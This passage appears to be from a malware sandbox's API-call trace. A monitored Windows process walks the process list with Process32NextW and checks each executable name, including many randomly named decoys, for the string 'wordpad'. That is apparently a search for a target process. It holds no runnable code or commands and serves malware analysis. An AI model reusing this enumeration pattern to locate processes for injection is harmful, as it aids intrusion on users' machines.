(uFlags=0x40, uBytes=0x13) returned 0x357d0e8 [0100.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357d0e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0100.634] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0100.634] StrStrIA (lpFirst="Memory Compression", lpSrch="wordpad") returned 0x0 [0100.635] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0100.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.636] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357d388 [0100.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357d388, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0100.636] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0100.636] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="wordpad") returned 0x0 [0100.636] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0100.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.638] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356df50 [0100.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356df50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0100.638] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0100.638] StrStrIA (lpFirst="SearchUI.exe", lpSrch="wordpad") returned 0x0 [0100.638] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0100.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.640] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d228 [0100.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357d228, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0100.640] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0100.640] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="wordpad") returned 0x0 [0100.640] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.641] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ded8 [0100.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356ded8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0100.641] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0100.641] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="wordpad") returned 0x0 [0100.641] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0100.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.642] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e160 [0100.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356e160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0100.643] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0100.643] StrStrIA (lpFirst="pending.exe", lpSrch="wordpad") returned 0x0 [0100.643] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0100.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.645] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bf00 [0100.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bf00, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0100.645] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0100.645] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="wordpad") returned 0x0 [0100.645] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0100.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.647] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d3e8 [0100.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357d3e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0100.647] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0100.647] StrStrIA (lpFirst="swing prefer.exe", lpSrch="wordpad") returned 0x0 [0100.647] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0100.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.648] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356c310 [0100.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356c310, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0100.648] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0100.648] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="wordpad") returned 0x0 [0100.648] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0100.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.650] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d468 [0100.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357d468, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0100.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0100.650] StrStrIA (lpFirst="nights-attending.exe", lpSrch="wordpad") returned 0x0 [0100.650] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0100.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.651] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e298 [0100.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356e298, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0100.652] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0100.652] StrStrIA (lpFirst="installed.exe", lpSrch="wordpad") returned 0x0 [0100.652] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0100.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.653] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c2e8 [0100.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356c2e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0100.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0100.653] StrStrIA (lpFirst="references compounds.exe", lpSrch="wordpad") returned 0x0 [0100.653] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0100.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.654] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d448 [0100.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357d448, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0100.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0100.655] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="wordpad") returned 0x0 [0100.655] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0100.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.656] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d128 [0100.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0100.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0100.656] StrStrIA (lpFirst="registered try.exe", lpSrch="wordpad") returned 0x0 [0100.656] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0100.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.657] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c2c0 [0100.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356c2c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0100.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0100.657] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="wordpad") returned 0x0 [0100.657] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0100.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.658] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e328 [0100.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356e328, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0100.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0100.659] StrStrIA (lpFirst="invite.exe", lpSrch="wordpad") returned 0x0 [0100.659] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0100.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.662] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e340 [0100.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356e340, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0100.663] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0100.663] StrStrIA (lpFirst="idol.exe", lpSrch="wordpad") returned 0x0 [0100.663] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0100.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.664] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c388 [0100.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356c388, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0100.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0100.664] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="wordpad") returned 0x0 [0100.664] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0100.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.665] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c3d8 [0100.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356c3d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0100.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0100.665] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="wordpad") returned 0x0 [0100.665] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0100.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.666] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e220 [0100.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356e220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0100.666] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0100.666] StrStrIA (lpFirst="powell_jane.exe", lpSrch="wordpad") returned 0x0 [0100.666] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0100.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.667] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d5c8 [0100.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357d5c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0100.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0100.668] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="wordpad") returned 0x0 [0100.668] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0100.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.668] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e178 [0100.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356e178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0100.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0100.669] StrStrIA (lpFirst="gainedshape.exe", lpSrch="wordpad") returned 0x0 [0100.669] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0100.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.670] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d5e8 [0100.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357d5e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0100.670] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0100.670] StrStrIA (lpFirst="opens-versions.exe", lpSrch="wordpad") returned 0x0 [0100.670] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, 